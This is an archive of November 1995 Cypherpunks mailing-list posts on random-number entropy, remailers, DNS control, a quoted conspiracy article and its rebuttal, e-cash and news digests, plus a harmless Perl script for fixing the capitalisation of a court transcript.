In-Reply-To:
Message-ID: <199511021747.JAA08919@orac.engr.sgi.com>

In article , Mark Murray writes:

>> ? "Gut feel" suggests to me that large amounts of "predicted" input might
>> be worse than the normal sort of system noise you have been using.
>>
>> But keep in mind that what we're doing is XOR'ing the input data into
>> the pool. (Actually, it's a bit more complicated than that. The input
>> is XOR'ed in with a CRC-like function, generated by taking an
>> irreducible polynomial in GF(2**128). But for the purposes of this
>> argument, you can think of it as XOR.)
>> So since you don't know what the
>> input state of the pool is, you won't know what the output state of the
>> pool.

> I chatted with a colleague at work, and he helped bend my mind right.
> I had the mistaken notion that adding lots of data would "overflow"
> and "dilute" the entropy to an attackable state.

I think the problem is not merely flooding the device with non-random input data. If you coordinate sucking out entropy with feeding in non-random data you can suck the real entropy in the system down to zero while making the driver think it has plenty of randomness.

While it's not clear to me how this would lead to an attack, it would be worrisome.

--
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything. -- Washington DC motto | tomw at engr.sgi.com

From anon-remailer at utopia.hacktic.nl Thu Nov 2 11:41:37 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Fri, 3 Nov 1995 03:41:37 +0800
Subject: New release of CFS...
In-Reply-To:
Message-ID: <199511011915.UAA18695@utopia.hacktic.nl>

Mats Bergstrom (asgaard at sos.sll.se) wrote:
> Andreas Bogk wrote:
>
> > Please report any leakage of this software immediately to this list.
>
> Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz

That's 1.3, not 1.3.1. What are the changes in the new version?

From tcmay at got.net Thu Nov 2 11:42:06 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 3 Nov 1995 03:42:06 +0800
Subject: US government department for crime enforcement!
Message-ID:

At 2:40 PM 11/1/95, anonymous-remailer at shell.portal.com wrote:
>It's come to my attention that the US government has a group
>called the 'Department of the Treasury Financial Crimes
>Enforcement Network' in Vienna, Virginia.
>
>I know that bureaucrats like to keep themselves busy, but even
>I didn't think they would go so far as to enforce crimes to
>keep the law enforcement people busy.
>
>What a curious way to spend the taxpayers' money.
The Financial Crimes Enforcement Network, FinCEN, is well known to readers of this list. If you grep for it in my Cyphernomicon FAQ, you should find references in several places. I first learned of it in 1990, and have followed it as best I can since. Not too much has been published about it. It's an interagency working group, with participation by Treasury, State, FBI, CIA, IRS, Justice, etc.

A good overview of it was in an early issue of "Wired," and is likely available at the HotWired Web site.

FinCEN's Web page is: http://www.ustreas.gov/treasury/bureaus/fincen/fincen.html

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From mark at unicorn.com Thu Nov 2 12:15:39 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Fri, 3 Nov 1995 04:15:39 +0800
Subject: New Mixmaster Remailer
Message-ID:

This is the official announcement for the Ecafe Mixmaster Remailer that has been running on ecafe.org for testing purposes for the last few weeks. The address to send to is mixmaster at remail.ecafe.org, message reordering is enabled with a poolsize currently set to two (which may be increased when we get more traffic), and the key is attached. The remailer is physically located in the UK.
For more information, check out the Web page at http://www.ecafe.org/~remail/

Mark

Here is the public key for Ecafe Remailer

From jya at pipeline.com Thu Nov 2 12:31:53 1995
From: jya at pipeline.com (John Young)
Date: Fri, 3 Nov 1995 04:31:53 +0800
Subject: CBW_boo
Message-ID: <199511021832.NAA29795@pipe3.nyc.pipeline.com>

11-2-95. W$Japer:

"Chemical and Biological Warfare Unmasked."

For the first time in more than 25 years, the U.S. may be waking up to the seriousness of CBW. This high-level awakening is long overdue and reflected in a sudden increase in CBW sensor development research and counter-proliferation programs. Still, these steps blithely disregard 25 years of revolutionary advances in the biological and chemical sciences and the potential products of the Russian program. There is no allowance for "nonmilitary" CBW applications. Yet the most troublesome developments in the Russian CBW program are agents designed for covert use against diplomats, politicians and business executives. Also absent is serious attention to terrorist motivations and options.
CBW_boo (9 kb)

From m5 at dev.tivoli.com Thu Nov 2 12:32:49 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Fri, 3 Nov 1995 04:32:49 +0800
Subject: FBI seeks huge wiretapping system
In-Reply-To: <199511020955.BAA04564@you.got.net>
Message-ID: <9511021924.AA12407@alpha>

hallam at w3.org writes:
> It is a fair point that just because technology has changed the
> nature of the game it should not mean that wiretaps cease to be
> possible.

I disagree that this is a "fair point". That wiretaps are possible is an accident of design. Just because that slice of the salami appears gone, I see no reason to concede that it can't be re-attached.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From sameer at c2.org Thu Nov 2 12:40:13 1995
From: sameer at c2.org (sameer)
Date: Fri, 3 Nov 1995 04:40:13 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID: <199511021810.KAA14547@infinity.c2.org>

>
> Is it? This is the _one_ thing in the article (is that term
> giving it too much legitimacy?) that I thought was barely true. Whoever
> controls the root level DNS servers effectively controls the Internet.
> I postulated a couple of months ago about how the US Govt might attempt
> to censor the rest of the world: "Remove lurid.porno.site.other-country
> from your DNS system within 72 hours or we will remove references to
> your DNS servers from the root level servers.". (I also speculated that
> if the US Govt tried doing this, that an 'underground' DNS system would
> form almost immediately.)
>

The US govt. doesn't run the root nameservers, nor are all the root nameservers within US jurisdiction.
--
sameer Voice: 510-601-9777
Community ConneXion FAX: 510-601-9734
The Internet Privacy Provider Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer at c2.org

From futplex at pseudonym.com Thu Nov 2 13:15:10 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 05:15:10 +0800
Subject: [FRED] Anonymity and Integrity
In-Reply-To: <9511021110.AA01070@all.net>
Message-ID: <199511021934.OAA22117@opine.cs.umass.edu>

Dr. Frederick B. Cohen writes:
> To clarify even further, I seem to recall a posting some months ago from
> an anonymous source declaring a new on-line for-sale forum called the
> Internet Security Newsletter (or some such thing). The anonymity of the
> poster in the context of asking for money and the fact that one of the
> people who was claimed to be on the board of editors was not, in fact, a
> participant, led to the question of who the person was.

The poster wasn't actually anonymous, but rather pseudonymous, in that case. (The pseudonym was the name of the publication, as I recall.)

> It turned out
> that this person had a substantial history of putting forth falsehoods
> as well as other related things that might have been very helpful in
> evaluating the credence of his statements. It turned out that the
> newsletter was, at least in some sense and without making value
> judgements, legitimate; but the anonymity of the person making the posts
> made it harder to assure the integrity of the statements made, which
> exacerbated the assurance issue.

It seems to me that the integrity of the statements was rather easily verified based on the merits of the statements themselves. In particular, one or two participants in the forum denied the claims made that they were members of the editorial board.

Granted, some people would have been more inclined to look askance at the messages if they had known the author's True Name. But as the saying goes, "past performance is not a guarantee of future results".
You can choose to doubt or believe a message because of the author's past reputation. But reputation is not a reliable predictor of the integrity of future assertions. It's a nice psychological crutch, but reliance on a "rational expectation" is a long way from anything I would call "assurance" or "verification". It doesn't prove anything. The only acceptable method of assurance I can see is careful analysis of the propositions posited, and empirical verification of the facts presented. Leaning on past reputation is accepting an odd form of Proof by Authority.

As it happened I had never heard of the True Name of the sender, so the knowledge wasn't useful to me.

> I understand that over time, reputations can be built up for pseudonyms
> (which are not necessarily anonyms) but then, with a pseudonym we might
> reasonably ask what the motive is for hiding the real identity.
[possible motives...]
> Without knowing the motive, how can we assess the statements?

By asking yourself if they seem to make sense, checking them against known facts and beliefs, etc. The same methods, IMHO, that are mainly appropriate to assess anyone's statements.

> In fact, how can we know that the original pseudonym still
> applies? Someone could kill you and take over your pseudonym, and even
> though we might hear of your death, the pseudonym might continue based
> on your reputation but with another actual source.

Of course, the is-a-person problem has been discussed at great length. Digital signatures are as effective for pseudonyms as for anyone else.

The messages we've seen "from Alice de `nonymous" might all have come from different senders. They exhibit a common tone and style, but that doesn't assure us of anything. In a sense that makes them more inviting, since there's always the chance that a third party is attempting a clever parody or a sly bit of character assassination.

[...]
> It's an interesting concept that each statement should/could be taken on > its own and evaluated independently of the rest of a person's life > context, but in my experience, that has serious problems. In my experience, that's about all I can usually do in network communication. In principle I _could_ devote scads of time to background investigations of my correspondents, for all except strongly anonymous and strongly pseudonymous parties, but I don't find that approach realistic. -Futplex From llurch at networking.stanford.edu Thu Nov 2 13:19:44 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Fri, 3 Nov 1995 05:19:44 +0800 Subject: censored? corrected [Steve Pizzo cited in The Spotlight] In-Reply-To: <199511020847.AAA10833@jobe.shell.portal.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 2 Nov 1995 anonymous-remailer at shell.portal.com wrote: > NOTE: More than 8 hours have passed since I sent this text in plaintext > directly to Cypherpunks without its being posted, so in this attempt I am > sending it encrypted through ALUMNI remailer. - Gary Jeffers > gjeffers at socketis.net Shit happens. > INFO BLACKOUT BWAHAHAHA! > From THE SPOTLIGHT newspaper's TECHNOLOGY & LIBERTY column by Clark > Matthews - Nov. 06, 1995 issue. The Spotlight's official classification in the UC and Stanford library databases is "Serials -- Anti-Semitic." I don't mean to offend anyone too much, but the Spotlight is generally regarded to be rather lunatic-fringe. Though the same is probably said of anyone on the cypherpunks list, hmm... > This ominous news came in the first of a series of articles by investi- > gative journalist Steven Pizzo in WEB REVIEW, an online magazine of cyber- > culture and politics (http://gnn.com/wr/) published by Songline Studios of Spotlight tends to be rather vague in its sources for a reason. I found the article to which this apparently refers at http://gnn.com/gnn/wr/sept29/news/natl/index.html. 
It is rather less lurid, but might still be of moderate concern. See the October 13 followup. I'm copying this to Steve Pizzo. I'm sure he'll get a real kick out of being cited in The Spotlight, whose politics are a little different than his.

> Through a complex chain of licensing arrangements and corporate acquisitions
> detailed in Pizzo's article, this crucial control over Internet
> domain names has passed from the non-profit National Science Foundation to
> Network Solutions, Inc. (NSI) of Herndon, Virginia. Last May, amid growing
> public disbelief of Establishment media reports about the Oklahoma City
> bombing provocation, NSI was purchased by Scientific Applications International
> Corporation (SAIC) of San Diego.

This is semantically and logically equivalent to: Last May, amid growing public disbelief of Establishment media reports about the Oklahoma City bombing provocation [provocation?], Fred Rogers changed his shoes. Obviously, Mr. Rogers is part of the conspiracy.

> SAIC is a $2 billion defense and FBI contractor with a board of directors
> that reads like a Who's Who of the intelligence community. Board
> members include Admiral Bobby Ray Inman, the former director of the National
> Security Agency (NSA) and deputy director of the CIA; Melvin Laird,
> defense secretary under Richard Nixon; Donald Hicks, former head of research
> & development for the Pentagon; Donald Kerr, former head of the Los
> Alamos National Laboratory; and Gen. Maxwell Thurman (ret.), the commander
> of the U.S. invasion of Panama.

I know that at least part of this is true, at least in part. SAIC also designed the hull of the Stars & Stripes yacht that won the America's Cup. Obviously Dennis Conner is part of a conspiracy that involves the Bavarian Illuminati, the Pope (who visited San Diego once), and New Zealand. Isn't it suspicious that the last America's Cup was contested and finally decided by the New York Supreme Court, the seat of the World Jewish Conspiracy?
Disclaimer: I was born in the San Diego area, and I know people who worked at SAIC, so I'm probably part of the conspiracy too.

> The Internet is a marvel of computer software technology. It was designed
> to survive a nuclear attack on the United States-like the Post
> Office, it's literally smart enough to find a way to get the mail through,
> even if most of the network is missing.

I believe this is the first time I have seen the Post Office favorably cited.

> But control of Internet domain name registration means the ability to
> remove troublesome-or outspoken-computer systems from the network. Potentially,
> this control also confers the power to insinuate "phantom"
> domains into the network-for surveillance purposes, for example-or for
> real-time, automatic censorship.

Anyone capable of sending this message should have known that this was complete BS.

> Furthermore, anecdotal evidence gathered by this author suggests that
> actual "truth control" is taking place on the 'net now. E-mail messages
> with controversial contents-including the details of the SAIC takeover of
> domain names-have consistently disappeared as they travel across the network.

And now we have PROOF! For THIS VERY MESSAGE, sent to THIS VERY LIST only EIGHT HOURS AGO was MYSTERIOUSLY DISAPPEARED! Hide the women and children!

> News items concerning the Vincent Foster "suicide" investigation
> and allegations of NSA bank spying through compromised Inslaw software are
> being quickly and automatically canceled. And the cancellations are not by
> their authors.

I know that several people who have been spamming the net with Foster garbage have been UDP'd. Read back issues of news.admin.net-abuse.misc.

> CRACKDOWN
>
> With domain names under the control of secret government insiders, it
> is even theoretically possible that large parts of the Internet could be
> SHUT DOWN AND SILENCED at critical times. This could be accomplished by
> suddenly altering domain name registrations or interposing compromised
> "domains" at crucial points.
>
> These compromised systems could serve as "black holes" at critical
> times, stopping e-mail and important news from reaching the world-or the
> rest of the country.
>
> Exercises in "turning the Internet off" have already taken place in
> Taiwan and Hong Kong. In Taiwan, the 'net was successfully shut down.
> All network traffic-including news, opinions and e-mail sent by computer
> users-was successfully "bottled up" on the island and prevented from
> reaching the world.
>
> In Hong Kong, the Internet wasn't quite strangled, but the British
> authorities who control that colony managed to throttle free electronic
> speech with the rest of the world until everything was bottlenecked into
> a few little-known satellite links.

Hmm, few specifics here. I wonder if they would care to elaborate. Nah. It is, of course, true that countries including Singapore, China, Vietnam, and Cuba control net access rather tightly, and there have been reprisals against online dissidents.

> These are alarming precedents and sure signs that powerful, shadowy
> forces are preparing to chop at the very roots of America's new Liberty
> Tree. The secretive people on the board of directors of SAIC are intelligence
> professionals skilled at manufacturing events-and then manufacturing
> public opinion and consent by controlling the truth. Will Internet
> disinformation, censorship or "shutdowns" signal the next American crisis?

Only the Shadow knows.
- -rich
llurch at networking.stanford.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJiap43DXUbM57SdAQHjBQP7BaaL0fgVCIpI5HDrTJ4TjtJgyjRWPWYU
vr2PuFBEGNZffzijaf9MTtwgjsYvy8/cMBuUiaBVIyVQloI1wfQMlHX1tVfnI6JM
hyT9zUJ4qovwsLCu+yX8JV1Ug2GtgyrW6AJJic+oFNohBJs8nQKxizwhVMa9AFrf
eAtmHLE+wsE=
=Qyen
-----END PGP SIGNATURE-----

From jim at acm.org Thu Nov 2 13:22:52 1995
From: jim at acm.org (Jim Gillogly)
Date: Fri, 3 Nov 1995 05:22:52 +0800
Subject: Transcript of Bernstein hearing is now available
In-Reply-To: <9511020308.AA25206@toad.com>
Message-ID: <199511021951.LAA03152@mycroft.rand.org>

> John Gilmore writes:
> We received the transcript of October 20's oral hearing from the court
> stenographer. It's up on the EFF Web site at:
> http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/951020_hearing.transcript

I find it hard to read things in all upper case. Here's a slowish 95% hack to make it more legible. I imagine there's a 5-line way to do it twenty times faster for 99% success, but what the heck...

Jim Gillogly
Highday, 12 Blotmath S.R. 1995, 19:47

-----------------------------------------------------------------------
#!/usr/bin/perl
# delegal: quick-n-dirty case conversion for Bernstein transcript
# 2 Nov 95, Gillogly

@propers = (
    "daniel", "dan", "marilyn", "hall", "patel", "california",
    "bernstein", "united", "department", "state", "cohn", "coppolino",
    "national", "security", "agency", "steefel", "levitt", "weiss",
    "court", "i", "mc", "glashan", "sarrall", "lee", "tien", "ed",
    "ross", "susan", "arnold", "justice", "anthony", "mandel",
    "bazarov", "appeals", "helme", "webster", "states", "dorfmont",
    "constitution", "constitutional", "doe", "schechter", "snuffle",
    "june", "lowell", "cj", "edler", "olc", "mr", "ninth", "circuit",
    "judge", "ritchie", "english", "dr", "freedman", "o", "brien",
    "pentagon", "cubby", "compuserve", "golden", "gate", "san",
    "francisco",
);

$INDENT_UPALL = 13;    # If indented deeper than this, upcase each word
$INDENT_UPCOLON = 6;   # If indented with a colon and these spaces, upcase
$INDENT_PARA = 10;     # If indented this deep, upcase first word
$INDENT_SENT = 2;      # Pick up sentence starts

while ($proper = pop(@propers)) {
    ($first, $rest) = ($proper =~ /^(.)(.*)$/);
    $first =~ tr/a-z/A-Z/;
    $caps{$proper} = $first . $rest;
}

while (<>) {
    tr/A-Z/a-z/;                           # Downcase everything
    s/u\.s\./U.S./g;                       # special case
    s/d\.c\./D.C./g;                       # special case
    s/([^a-z])nsa([^a-z])/$1NSA$2/g;       # Another one
    s/([^a-z])itar([^a-z])/$1ITAR$2/g;     # Another one

    # Upcase known proper names
    while (($proper, $cap) = each(%caps)) {
        ($first, $rest) = ($proper =~ /^(.)(.*)$/);
        s/([^a-z])$proper([^a-z])/$1$cap$2/g;
    }

    # If it's indented deeply, upcase each word
    if (/ {$INDENT_UPALL}/ || /: {$INDENT_UPCOLON}/) {
        while (($low) = /[^a-zA-Z]([a-z])/) {
            $low =~ tr/a-z/A-Z/;
            s/([^a-zA-Z])[a-z]/$1$low/;
        }
    }

    # Upcase middle initials
    while (($init) = / ([a-z])\./) {
        $init =~ tr/a-z/A-Z/;
        s/ [a-z]\./ $init\./;
    }

    # Upcase paragraphs
    if (($init) = / {$INDENT_PARA}([a-z])/) {
        $init =~ tr/a-z/A-Z/;
        s/( {$INDENT_PARA})[a-z]/$1$init/;
    }

    # Sentences
    ($num, $_) = /^([ \d]*)([^ \d].*)$/;   # Simplify
    while (($init) = /[^ ] {$INDENT_SENT}([a-z])/) {
        $init =~ tr/a-z/A-Z/;
        s/( {$INDENT_SENT})[a-z]/$1$init/;
    }
    $_ = $num . $_ . "\n";
    print $_;
}
-----------------------------------------------------------------------

From fc at all.net Thu Nov 2 14:19:20 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Fri, 3 Nov 1995 06:19:20 +0800
Subject: Surviving DNS disruption
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <9511022120.AA15892@all.net>

Sten Drescher opined:
> sameer said:
>
> >> Is it? This is the _one_ thing in the article (is that term giving
> >> it too much legitimacy?) that I thought was barely true. Whoever
> >> controls the root level DNS servers effectively controls the
> >> Internet. I postulated a couple of months ago about how the US Govt
> >> might attempt to censor the rest of the world: "Remove
> >> lurid.porno.site.other-country from your DNS system within 72 hours
> >> or we will remove references to your DNS servers from the root level
> >> servers.". (I also speculated that if the US Govt tried doing this,
> >> that an 'underground' DNS system would form almost immediately.)
> >>
> s> The US govt. doesn't run the root nameservers, nor are all the
> s> root nameservers within US jurisdiction.
>
> Granted, the US Govt doesn't run the US-based root servers.
> But, if an Internet 'Decency' law was passed, they certainly could try
> to threaten the US-based root server maintainers to make the cascading
> threats. And, as I understand the way DNS resolution works, address
> requests go down to your root domain then up from the other root domain,
> i.e., for me to find out what c2.org's address is, my system requests
> from:
> NS mpd.tandem.com
> NS tandem.com
> NS com
> NS org
>
> If this is correct, if the com NS has the entry for the org NS, I won't
> be able to resolve those names. Of course, explicit IP addresses and
> /etc/hosts entries would still work.

We all know that an alternative DNS structure would rapidly appear, and perhaps even a second US (black) Internet - with links between the old and new fully automatic and transparent. However, perhaps a good cypherpunks project would be to create and test a contingency plan and start an alternative DNS system in parallel with the government run ones.

--
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From cme at TIS.COM Thu Nov 2 15:13:18 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 3 Nov 1995 07:13:18 +0800
Subject: Sources of randomness
In-Reply-To: <199511021940.LAA00300@comsec.com>
Message-ID: <9511022143.AA26596@tis.com>

>Date: Thu, 2 Nov 1995 00:39:29 -0800
>From: tcmay at got.net (Timothy C. May)

>Digitized video input, especially from something like a noisy channel (t.v.
>channel, for example), is quite likely to produce a lot more entropy bits
>per second than nearly any of us ever need. (One's PGP key could be seeded
>in a fraction of a millisecond, for example.)
My cable feed into my Mac, for example, has surprisingly little noise -- and it's only local noise (stuff only at my house, not available to the eavesdropper) which counts as entropy.

> One of the basic ideas we
>have had, as Cypherpunks, is to encourage widespread methods. Any methods
>that need special hardware tend to not get widely used.
>
>Audio, video, disk timing, and all sorts of other sources of physical
>randomness are useful to have, but most people either won't have the right
>configuration or won't configure their systems so as to use their
>configuration.

Most Macs and PCs have audio inputs. Most of those are mono, unfortunately. [The numeric difference between two stereo mics is especially hard for an eavesdropper-wannabe to predict/compute, assuming the room isn't silent.] However, if the eavesdropper doesn't have a mic in your room, there's still some entropy available on the mono channel.

Meanwhile, my old Sparcstation 1 had an A-D which, when no mic was connected, gave about 1 bit/second of entropy. (The newer Sparc here gives solid 0's with no mic.)

Recorded audio is useless as entropy, of course.

Almost all computers have a mouse and a normal signature, hand-written with a mouse, has great gobs of noise. (I'm still working on the little PC program to measure this -- but preliminary results show a minimum of 1 bit of noise per mouse sample -- or 200 bits per signature. Final results may get higher entropy rates, but I'll wait for the real results before claiming that.)

+--------------------------------------------------------------------------+
|Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme |
|Trusted Information Systems, Inc. http://www.tis.com/ |
|3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 |
+--------------------------------------------------------------------------+

From jya at pipeline.com Thu Nov 2 15:25:00 1995
From: jya at pipeline.com (John Young)
Date: Fri, 3 Nov 1995 07:25:00 +0800
Subject: LAF_las
Message-ID: <199511021959.OAA07546@pipe5.nyc.pipeline.com>

For we CIA-corn peckers:

Wash Rag today hangs out Page Oner on the billions wasted on armaments based on flawed data by the CIA. It has pointers on how the spooks chew the raw spew and hawk oysters upstairs.

Two, NYPaper chickenshits editorially on the same, clucks affirmation of Deutch and US Congress under-oversight.

Three, contrarily, NYP's Maureen Dowd ridicules the CIA macho history of acceptable wickedness in the public interest, and hoots at Deutch's "mensch" complicity, saying that laughable agencies don't survive godawfully wicked Washington. Cackling right on, Mo.

LAF_las

From POSTMAST at MVS.MEDCTR.UCLA.EDU Thu Nov 2 15:46:49 1995
From: POSTMAST at MVS.MEDCTR.UCLA.EDU (BITNET POSTMASTER)
Date: Fri, 3 Nov 1995 07:46:49 +0800
Subject: Reply to ERROR: MAX RETRIES E
Message-ID:

*** Sent by Alternate User "LM#LK" for "POSTMAST" ***

*** Original Author: DRESCHS @ TANDEM - ** Remote User **; 11/02/95 12:27

>Message ID: X5306122746 WAS FORWARDED BY POSTMASTER at MGMT
>Original sender: DRESCHS @TANDEM
>
>Received: from relay3.UU.NET by MVS.MEDCTR.UCLA.EDU (IBM MVS SMTP V2R2.1)
> with TCP; Thu, 02 Nov 95 12:27:32 PDT
>Received: from toad.com by relay3.UU.NET with SMTP
> id QQzodt13430; Thu, 2 Nov 1995 15:16:35 -0500 (EST)
>Received: by toad.com id AA12091; Thu, 2 Nov 95 11:58:50 PST
>Received: from devnull (devnull.mpd.tandem.com) by toad.com id AA12085; Thu, 2
> Nov 95 11:58:42 PST
>Received: from galil.austnsc.tandem.com. by devnull (8.6.8/8.6.6)
> id NAA03606; Thu, 2 Nov 1995 13:58:28 -0600
>Received: (from dreschs at localhost) by galil.austnsc.tandem.com. (8.7.1/8.7.1) i
> OAA09507; Thu, 2 Nov 1995 14:00:32 -0600 (CST)
>Date: Thu, 2 Nov 1995 14:00:32 -0600 (CST)
>From: Sten Drescher
>Message-Id: <199511022000.OAA09507 at galil.austnsc.tandem.com.>
>To: sameer
>Cc: cypherpunks at toad.com
>In-Reply-To: sameer's message of Thu, 2 Nov 1995 10:10:43 -0800 (PST)
>Subject: Re: censored? corrected Steve Pizzo cited in The Spotlight
>References: <199511021624.KAA05751 at galil.austnsc.tandem.com.>
> <199511021810.KAA14547 at infinity.c2.org>
>Sender: owner-cypherpunks at toad.com
>Precedence: bulk
>
sameer said:

>> Is it? This is the _one_ thing in the article (is that term giving
>> it too much legitimacy?) that I thought was barely true. Whoever
>> controls the root level DNS servers effectively controls the
>> Internet. I postulated a couple of months ago about how the US Govt
>> might attempt to censor the rest of the world: "Remove
>> lurid.porno.site.other-country from your DNS system within 72 hours
>> or we will remove references to your DNS servers from the root level
>> servers.". (I also speculated that if the US Govt tried doing this,
>> that an 'underground' DNS system would form almost immediately.)
>>

s> The US govt. doesn't run the root nameservers, nor are all the
s> root nameservers within US jurisdiction.

Granted, the US Govt doesn't run the US-based root servers. But, if an Internet 'Decency' law was passed, they certainly could try to threaten the US-based root server maintainers to make the cascading threats. And, as I understand the way DNS resolution works, address requests go down to your root domain then up from the other root domain, i.e., for me to find out what c2.org's address is, my system requests from:

NS mpd.tandem.com
NS tandem.com
NS com
NS org

If this is correct, if the com NS has the entry for the org NS, I won't be able to resolve those names.
Of course, explicit IP addresses and

*** Comments From: POSTMAST - POSTMASTER, BITNET; 11/02/95 12:54

Can someone please tell me how to remove/unsubscribe an email address from this mail list. I need the exact commands. Apparently someone subscribed to this list using an invalid email address and all the mail messages are ending up in a bounced mail file. We need to get this email address unsubscribed. Thank you for your help.

Postmaster
mvs.medctr.ucla.edu

From jya at pipeline.com Thu Nov 2 15:47:06 1995
From: jya at pipeline.com (John Young)
Date: Fri, 3 Nov 1995 07:47:06 +0800
Subject: ECC_boo
Message-ID: <199511021831.NAA29402@pipe3.nyc.pipeline.com>

11-2-95. W$Japer:

"Happy, Healthy and Odd: Nonconformists Live Longer."

For modern-day eccentrics, computer hackers qualified, as did academics, scientists, rock stars and artists.

Traits: nonconforming; creative; strongly motivated by curiosity; idealistic (wanting to make the world a better place and the people in it happier); cheerfully obsessed with one or more hobbyhorses; aware from early childhood of being different; intelligent, opinionated, outspoken; convinced of being right and that the rest of the world is out of step; noncompetitive (not in need of reassurance from the rest of society); unusual in eating habits and living arrangements; not particularly interested in the opinions or the company of other people, except to persuade them to his point of view; possessed of a mischievous sense of humor; single; usually the eldest or an only child; a bad speller.

ECC_boo (9 kb)

From dreschs at mpd.tandem.com Thu Nov 2 15:54:16 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Fri, 3 Nov 1995 07:54:16 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511021624.KAA05751@galil.austnsc.tandem.com.>
Message-ID: <199511022000.OAA09507@galil.austnsc.tandem.com.>

sameer said:

>> Is it? This is the _one_ thing in the article (is that term giving
>> it too much legitimacy?) that I thought was barely true. Whoever
>> controls the root level DNS servers effectively controls the
>> Internet. I postulated a couple of months ago about how the US Govt
>> might attempt to censor the rest of the world: "Remove
>> lurid.porno.site.other-country from your DNS system within 72 hours
>> or we will remove references to your DNS servers from the root level
>> servers.". (I also speculated that if the US Govt tried doing this,
>> that an 'underground' DNS system would form almost immediately.)
>>

s> The US govt. doesn't run the root nameservers, nor are all the
s> root nameservers within US jurisdiction.

Granted, the US Govt doesn't run the US-based root servers. But, if an Internet 'Decency' law was passed, they certainly could try to threaten the US-based root server maintainers to make the cascading threats. And, as I understand the way DNS resolution works, address requests go down to your root domain then up from the other root domain, i.e., for me to find out what c2.org's address is, my system requests from:

NS mpd.tandem.com
NS tandem.com
NS com
NS org

If this is correct, if the com NS has the entry for the org NS, I won't be able to resolve those names. Of course, explicit IP addresses and /etc/hosts entries would still work.

--
#include /* Sten Drescher */
To get my PGP public key, send me email with your public key and Subject: PGP key exchange
Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3

From rah at shipwright.com Thu Nov 2 16:07:14 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 3 Nov 1995 08:07:14 +0800
Subject: e$: 24 Hours
Message-ID:

> Showed up at the speaker's desk at Infoworld Boston, got
                                     ^^^^^^^^^Internet World Boston

Ack. Spam the planet and then typo the first paragraph. Sorry.
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA
(617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From hallam at w3.org Thu Nov 2 16:33:41 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 3 Nov 1995 08:33:41 +0800
Subject: ecash remailer
In-Reply-To: <9511021209.ZM7820@morgan.com>
Message-ID: <9511022231.AA08841@zorch.w3.org>

>So, refuse to buy their money.
>Demand open systems.

One problem a number of people have reported in DigiCash is disappearing money. Several people have reported that if a transfer is misconfigured the cash can flow out of the wallet, be rejected at the other end and disappear from the system - i.e. misprinted names on cheques mean lost cash!

This is bad and they report that Digicash did not respond to their complaints.

Phill

From jya at pipeline.com Thu Nov 2 16:46:56 1995
From: jya at pipeline.com (John Young)
Date: Fri, 3 Nov 1995 08:46:56 +0800
Subject: EMU_boo
Message-ID: <199511021830.NAA29064@pipe3.nyc.pipeline.com>

11-2-95. FT:

"Electronic money in a race with Emu."

Economic and monetary union or electronic money? Recent suggestions that the start of Emu might be delayed beyond 1999 raise the intriguing possibility that a viable international electronic money will be available before the European single currency. Depending on your perspective, this would be either disaster or nirvana.

Disaster, because governments and central banks in countries with weak currencies would lose the seignorage that currency issue brings, and the sovereignty it is supposed to provide (but may not).

Disaster, because it would destroy two central aims of Emu: the sharing of power between monetary authorities, and the attempted imposition of currency soundness by institutional fiat.
Nirvana, because it would provide people with a powerful protection against the random and hidden taxation imposed on them when governments inflate, and because it would create monetary soundness via market forces.

EMU_boo (5 kb)

FT on the Web: or . Selections available, not this one, but read today's "Smart building" for the security and ID gadgets to track-attack-siphon.

From llurch at networking.stanford.edu Thu Nov 2 16:49:35 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Fri, 3 Nov 1995 08:49:35 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
